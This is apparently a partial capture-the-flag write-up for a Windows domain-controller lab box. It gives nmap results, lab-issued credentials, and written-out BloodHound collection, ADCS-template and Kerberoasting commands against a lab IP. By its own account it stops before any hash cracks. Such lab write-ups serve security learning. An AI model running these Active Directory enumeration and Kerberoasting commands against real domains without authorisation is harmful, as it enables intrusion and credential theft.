Pirate
Overview
Pirate is a hard Windows box exposing a domain controller (DC01.pirate.htb)
with a set of starting pentest credentials. The intended entry point appears to
be through the Active Directory environment — the notes cover initial BloodHound
collection and Kerberoasting, but the crackable path was not resolved within
the session documented here.
Path (partial): pentest creds → BloodHound → Kerberoast ADM / A.WHITE SPNs → (crack) → …
Enumeration
The nmap scan confirms a Windows domain controller. Notable ports are DNS (53),
HTTP (80), Kerberos (88), LDAP (389/636/3268/3269), SMB (445), and RPC (593).
The SSL certificate on LDAP pins the hostname to DC01.pirate.htb in the
pirate.htb domain.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb)
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap (Domain: pirate.htb, commonName=DC01.pirate.htb)
3268/tcp open ldap
3269/tcp open ssl/ldap
Service Info: Host: DC01; OS: Windows

The box comes with starting credentials:
pentest / p3nt3st2025!&
Enumeration — BloodHound Collection
With valid credentials, BloodHound collection runs via NetExec’s built-in
--bloodhound module (the Python bloodhound.py collector failed to ingest
properly):
$ nxc ldap 10.129.7.69 -u pentest -p 'p3nt3st2025!&' -d pirate.htb \
--bloodhound --collection All \
--dns-server 10.129.7.69 --kdcHost 10.129.7.69
Checking for vulnerable ADCS certificate templates turns up nothing:
$ certipy find -u 'pentest@pirate.htb' -p 'p3nt3st2025!&' \
-dc-ip 10.129.7.69 -vulnerable -stdout

BloodHound identifies two Kerberoastable accounts:

Kerberoasting
Both Kerberoastable SPNs are targeted — one of them appears to be ADM,
with a possible secondary pivot to A.WHITE:

Requesting the service tickets:
$ GetUserSPNs.py pirate.htb/pentest:'p3nt3st2025!&' \
-dc-ip 10.129.7.69 -request

Offline cracking against standard wordlists did not recover the ADM hash.
Notes
Thin notes — the writeup ends at the Kerberoasting stage. The session
ran out of steam after the ADM hash resisted rockyou.txt; no further
pivots, credentials, or paths were documented. The full exploitation chain
remains to be revisited.
Takeaways
- Pre-supplied pentest credentials enable fast BloodHound collection — go
straight to
nxc ldap --bloodhoundto avoid the Python collector’s ingest quirks. - Kerberoastable service accounts are only useful if the ticket cracks. Strong service-account passwords (or AES-only tickets) require larger wordlists or rule-based mangling before cracking succeeds.